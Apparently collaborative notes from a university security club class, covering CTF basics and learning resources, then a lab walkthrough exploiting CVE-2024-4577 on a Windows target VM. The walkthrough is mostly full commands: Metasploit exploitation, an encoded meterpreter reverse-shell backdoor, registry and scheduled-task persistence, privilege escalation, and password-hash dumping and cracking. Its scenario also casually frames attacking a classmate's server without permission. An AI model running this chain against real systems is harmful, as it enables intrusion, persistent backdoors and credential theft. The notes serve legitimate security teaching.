--- title: "[社課共筆]20251009-現在正是駭客的時刻" description: tags: 社課,共筆,駭客,CTF,滲透測試,CVE-2024-4577 --- :::success # 現在正是駭客的時刻 **時間:** 2025/10/09(星期四)18:30 ~ 21:00 **地點:** 挺生大樓 A3-200 教室 **簡報:** [連結]() **Slido:** [連結](https://app.sli.do/event/381N8WBsT7h4iDimuDJVbA) **回饋表單:** [連結](https://forms.gle/iLLqYjLZGyMqoTtM9) ![qr.ioi.tw](https://hackmd.io/_uploads/BkYPHXBTxx.png =100x) ::: - [下載 VMware Workstation Pro](https://knowledge.broadcom.com/external/article/344595/downloading-and-installing-vmware-workst.html) - [社團雲端:課程檔案](https://drive.google.com/drive/folders/1zSwOFLy--UOKgEI3uPxC0uZU6t3khY2N?usp=sharing) - [講師雲端:課程檔案(包含 VM)](https://drive.google.com/drive/folders/1A0PSlP8k7h-272eHa9Qk0BDu-vWQt0pJ?usp=sharing) **預備知識** - 基礎 shell 操作 ## 環境準備 這次的環境會需要比較多的硬體資源,因此建議各位至少: - 預留 40GB 的儲存空間用來放虛擬機 - 電腦要有 16G 會讓使用體驗比較順暢 :::info 然後下載檔案會超慢,所以建議活動開始前就先開始下載。 ::: 首先你需要安裝 VMware Workstation Pro,可以選擇去按照 [官網](https://knowledge.broadcom.com/external/article/344595/downloading-and-installing-vmware-workst.html) 的方式下載,或是直接從這次課程的 [Google Drive](https://drive.google.com/drive/folders/1zSwOFLy--UOKgEI3uPxC0uZU6t3khY2N?usp=sharing) 中下載。安裝的部分就不多做說明,總之就是下一步就對了。 虛擬機我們會需要 Kali Linux 和 Windows 靶機。Kali 可以去 [官網](https://www.kali.org/get-kali/#kali-virtual-machines) 上選擇 VMware 版本的 Image。Windows 靶機活動當天會發,因為有點肥 ...。 ## 駭客 駭客都是壞蛋!? <!-- 帥哥 --> Hacker vs Cracker ~~臺灣新聞亂帶風向~~ Hacker 原指技術很厲害的人 > 駭客分類:白、灰、黑帽....(還有好多) > **綠色:菜逼八** > ~~CIA~~ > **如何成為駭客?*** > 基礎程式能力、電腦科學、打CTF、靶機、找到自己的興趣繼續努力 > 駭客也有證照!!! ## CTF > 自由做筆記 > 駭客們的電競遊戲 **CTF 六大系** - 雜項 Misc - 圖片、肉搜、情報傳遞、一點鑑識 - 鑑識 Forensic - 分析系統記憶體 or 網路封包 - 密碼學 Crypto - 數學、各種加密... - 網頁 Web -> 滲透測試 - 網頁漏洞 (OWASP Top10) 、語言尿性 - 逆向工程 Reverse -> 軟體破解、遊戲外掛、惡意軟體 - 奇怪的加密、解殼、VMP、數學??? - 二進位置的漏洞利用 Pwn -> 爆破印表機、門禁... - BoF、Heap、Kernel <!-- 凱崴&芋泥加油W 吐了...我們有芋泥!--> <!-- no --> **賽制** - Jeopardy - Attack & Defense - King of the Hill ### CTF 資源 > [CTF Time](https://ctftime.org/) #### 世界級 CTF - ~~HITOCN~~ HITCON CTF -> 台灣最頂 - DEFCON CTF - ... #### 入門級 CTF 國外: - pico CTF - TJCTF 國內: - AIS# pre-exam - Myfirst CTF - ... #### 台灣的學習資源 - AIS3 暑期camp - TeamT5 Camp - AIS3 好厲駭 高階培訓/導師培訓 - 台科資安社 - 成大資安社 - 逢甲黑客社 - 輔大 NISRA #### 線上學習資源 - 教學導向 - OverTheWire - pwn.college - 練習題目 - picoCTF - ... <!-- 太快www --> <!-- 手速需加強qq --> <!-- 我太難了 --> ## CVE-2024-4577 > 自由做筆記 --- 你是大同大學的學生,有一天你在亂玩 `nmap`,發現學校有同學開著網頁伺服器沒關。想說幫忙測試看看,你興奮的用瀏覽器打開了網頁,發現這個網站充滿了漏洞... :::warning <i class="fa fa-thumb-tack" aria-hidden="true"></i> **目標**:打進伺服器並且提權到 NT AUHORITY/SYSTEM ::: ### Writeup :::info 以下指令看到有用 `<`、`>` 包起來標註的文字,就是你要自己替換調的地方。e.g. `<ip>` -> `192.168.0.1`。 還有看到指令前面的 `$` 不要太興奮整行複製貼上,那是指令介面的提示文字。 ::: 偵查環境 ```shell $ ip a # 取得自己的 IP $ sudo nmap <ip>/24 # 掃描網段 $ sudo namp -A <target ip> # 掃描目標主機 ``` 掃描網頁程式 ```shell $ dirb http://<ip> -r ``` 接著可以到處戳戳看 XD 有留一些常見的漏洞可以玩 030 <!-- 030 感覺是死語喔www --> --- 開啟 Metasploit Framework,他是一個滲透測試框架,提供很多整合好的工具。 ```shell $ sudo msfconsole ``` 首先來找找有沒有跟漏洞有關的模組可以用 ```shell msf6 > search cve 2024 4577 msf6 > use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577 msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > options ``` 設定要攻擊的目標 IP,然後執行腳本。完成後就會拿到一個暫時的後門程式了。 ```shell msf6 exploit(...) > set RHOST <ip> msf6 exploit(...) > exploit ``` 先用 `msfvenom` 生一個後門程式。 ```bash ARGS=( -p windows/x64/meterpreter/reverse_tcp # 通訊方式 --encoder x64/xor # 混淆的方式 --arch x64 --platform windows # 目標架構、平台 --format exe # 輸出格式 LHOST=eth0 LPORT=443 # 通訊參數,用預設網卡 ) msfvenom "${ARGS[@]}" > meoware.exe ``` :::spoiler 一行指令 ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp --encoder x64/xor --arch x64 --platform windows --format exe LHOST=eth0 LPORT=443 > meoware.exe ``` ::: 然後透過 meterpreter 把後門程式上傳到主機 ```shell meterpreter > upload meoware.exe ``` 之後打開另一個終端機,開啟 msfconsole。然後用 `exploit/multi/handler` 來接收後門的回連。 :::warning 這邊的設定要和之前產生後門程式的參數相同,例如: - payload - encoder - LHOST - LPORT ::: ```shell msf6 > use exploit/multi/handler msf6 exploit(...) > set LHOST eth0 msf6 exploit(...) > set LPORT 443 msf6 exploit(...) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(...) > set encoder x64/xor msf6 exploit(...) > exploit ``` 切回第一個終端機,透過 meterpreter 在主機上執行 `meoware.exe`,程式就會嘗試建立後門 ```shell msf6 exploit(...) > execute -f meoware.exe ``` 再回到第二個開起來的視窗,就可以享用拿到的後門了!! ### 持久化 用註冊表,缺點是要使用者登入才有 ```shell meterpreter > reg setval -k "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -v meow -d "c:\xampp\php\meoware.exe" ``` 用排成任務,但需要高權限 ```ps1 schtasks /create /TN "Meow" /sc minute /mo 1 /tr "c:\xampp\php\meoware.exe" ``` ### 提權 ```shell meterpreter > background # 把 meterpreter 切回背景,並保持連線 msf6 exploit(...) > use post/multi/recon/local_exploit_suggester ``` ```shell meterpreter > getsystem # 取得 NT/AUTHORTY 帳號 meterpreter > getuid # 看目前使用者 id ``` ### 密碼爆破 在 meterpreter 中可以 dump 出系統儲存密碼的雜湊值 ```shell meterpreter > hashdump ``` hash 的結構: ``` <用户名>:<RID>:<LM hash>:<NT hash>::: ``` 我們要解的是 NT hash,可以用 `john` 或是 `hashcat` 搭配字典爆破。 ```shell # 字典爆破 $ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt --rules hashes.txt $ john --format=NT --incremental hashes.txt # 純暴力 $ john --show --format=NT hashes.txt # 看成果 ``` ## 其他有趣的東西 - `screenshot`:螢幕截圖 - `screenshare`:螢幕分享 --- :::spoiler 寒期教育優先區營隊 ![寒期教育優先區](https://hackmd.io/_uploads/HkB-mhMnll.png) :::